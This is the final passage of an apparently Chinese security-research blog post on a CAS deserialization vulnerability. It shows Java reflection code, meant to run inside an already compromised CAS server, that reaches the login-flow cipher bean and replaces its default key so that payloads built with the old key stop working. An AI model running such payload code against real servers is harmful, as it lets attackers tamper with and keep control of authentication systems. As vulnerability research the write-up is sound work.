XmlWebApplicationContext.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;beanFactory&quot;</span>);</span><br><span class="line">beanFactory.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">DefaultListableBeanFactory</span> <span class="operator">=</span> beanFactory.get(XmlWebApplicationContext);</span><br><span class="line"><span class="type">Field</span> <span class="variable">singletonObjects</span> <span class="operator">=</span> DefaultListableBeanFactory.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;singletonObjects&quot;</span>);</span><br><span class="line">singletonObjects.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Map</span> <span class="variable">map2</span> <span class="operator">=</span> (Map) singletonObjects.get(DefaultListableBeanFactory);</span><br><span class="line"><span class="type">Object</span> <span class="variable">loginFlowCipherBean</span> <span class="operator">=</span> map2.get(<span class="string">&quot;loginFlowCipherBean&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115142504-bhxufgb.png" alt="image"></p>
<p>然后通过调用BufferedBlockCipherBean对象的父类父类的setKeyPassword方法，即可修改为新的key</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Thread</span> <span class="variable">thread</span> <span class="operator">=</span> Thread.currentThread();</span><br><span class="line"><span class="type">Field</span> <span class="variable">threadLocals</span> <span class="operator">=</span> thread.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;threadLocals&quot;</span>);</span><br><span class="line">threadLocals.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">ThreadLocalMap</span> <span class="operator">=</span> threadLocals.get(thread);</span><br><span class="line"><span class="type">Field</span> <span class="variable">table</span> <span class="operator">=</span> ThreadLocalMap.getClass().getDeclaredField(<span class="string">&quot;table&quot;</span>);</span><br><span class="line">table.setAccessible(<span class="literal">true</span>);</span><br><span class="line">ThreadLocal.ThreadLocalMap.Entry[]  ThreadLocalMap_Entry = (ThreadLocal.ThreadLocalMap.Entry[])table.get(ThreadLocalMap);</span><br><span class="line"><span class="type">Field</span> <span class="variable">value</span> <span class="operator">=</span> ThreadLocalMap_Entry[<span class="number">22</span>].getClass().getDeclaredField(<span class="string">&quot;value&quot;</span>);</span><br><span class="line">value.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">MvcExternalContext</span> <span class="operator">=</span> value.get(ThreadLocalMap_Entry[<span class="number">22</span>]);</span><br><span class="line"><span class="type">Field</span> <span class="variable">requestMap_filed</span> <span class="operator">=</span> MvcExternalContext.getClass().getSuperclass().getDeclaredField(<span class="string">&quot;requestMap&quot;</span>);</span><br><span class="line">requestMap_filed.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">LocalAttributeMap</span> <span class="operator">=</span> requestMap_filed.get(MvcExternalContext);</span><br><span class="line"><span class="type">Field</span> <span class="variable">attributes</span> <span class="operator">=</span> LocalAttributeMap.getClass().getDeclaredField(<span class="string">&quot;attributes&quot;</span>);</span><br><span class="line">attributes.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Map</span> <span class="variable">map</span> <span class="operator">=</span>(Map) attributes.get(LocalAttributeMap);</span><br><span class="line"><span class="type">Object</span> <span class="variable">XmlWebApplicationContext</span> <span class="operator">=</span> map.get(<span class="string">&quot;org.springframework.web.servlet.DispatcherServlet.CONTEXT&quot;</span>);</span><br><span class="line"><span class="type">Field</span> <span class="variable">beanFactory</span> <span class="operator">=</span> XmlWebApplicationContext.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;beanFactory&quot;</span>);</span><br><span class="line">beanFactory.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">DefaultListableBeanFactory</span> <span class="operator">=</span> beanFactory.get(XmlWebApplicationContext);</span><br><span class="line"><span class="type">Field</span> <span class="variable">singletonObjects</span> <span class="operator">=</span> DefaultListableBeanFactory.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;singletonObjects&quot;</span>);</span><br><span class="line">singletonObjects.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Map</span> <span class="variable">map2</span> <span class="operator">=</span> (Map) singletonObjects.get(DefaultListableBeanFactory);</span><br><span class="line"><span class="type">Object</span> <span class="variable">loginFlowCipherBean</span> <span class="operator">=</span> map2.get(<span class="string">&quot;loginFlowCipherBean&quot;</span>);</span><br><span class="line"><span class="type">Method</span> <span class="variable">setKeyPassword</span> <span class="operator">=</span> loginFlowCipherBean.getClass().getSuperclass().getSuperclass().getMethod(<span class="string">&quot;setKeyPassword&quot;</span>,String.class);</span><br><span class="line">setKeyPassword.invoke(loginFlowCipherBean,<span class="string">&quot;changit2&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115152935-7my1mhx.png" alt="image"></p>
<p>此时在利用changit生成的payload，漏洞已无法利用</p>
<p><img src="/2022/03/09/cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20221115155846-30wye1p.png" alt="image"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E8%A6%81"><span class="nav-number">1.</span> <span class="nav-text">简要</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88login%E5%8F%AF%E4%BB%A5%E8%A7%A6%E5%8F%91logout%E5%8D%B4%E6%97%A0%E6%B3%95%E8%A7%A6%E5%8F%91"><span class="nav-number">3.1.</span> <span class="nav-text">为什么login可以触发logout却无法触发</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#poc"><span class="nav-number">4.</span> <span class="nav-text">poc</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cas%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%8B%93%E5%B1%95%E6%94%BB%E5%87%BB-%E4%BF%AE%E6%94%B9key"><span class="nav-number">5.</span> <span class="nav-text">cas反序列化拓展攻击-修改key</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zad"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">zad</p>
  <div class="site-description" itemprop="description">不忘初心,方得始终</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">1</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Zbadblog" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Zbadblog" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zad</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
